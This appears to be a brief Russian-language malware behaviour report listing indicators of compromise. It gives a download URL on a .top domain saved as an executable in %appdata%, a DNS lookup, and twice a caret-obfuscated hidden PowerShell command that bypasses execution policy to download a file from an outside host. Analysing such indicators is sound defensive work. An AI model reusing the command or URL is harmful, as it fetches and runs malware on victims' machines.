Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWe^RS^HEl^L.^Ex^E -^E^xe^cUtI^onpoL^I^C^Y^ ^bYP^AS^S^ -^nOpROfiLe ^-wiNDo^wSTY^le ^hi^ddE^N ^(n^Ew^-o^bjeCt ^S^ySt^Em.N^eT.WEBc^l^I^en^T).^DoW^NlO^a^DF^I^l^E('http:/...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "PoWe^RS^HEl^L.^Ex^E -^E^xe^cUtI^onpoL^I^C^Y^ ^bYP^AS^S^ -^nOpROfiLe ^-wiNDo^wSTY^le ^hi^ddE^N ^(n^Ew^-o^bjeCt ^S^ySt^Em.N^eT.WEBc^l^I^en^T).^DoW^NlO^a^DF^I^l^E('http:/...' (со скрытым окном)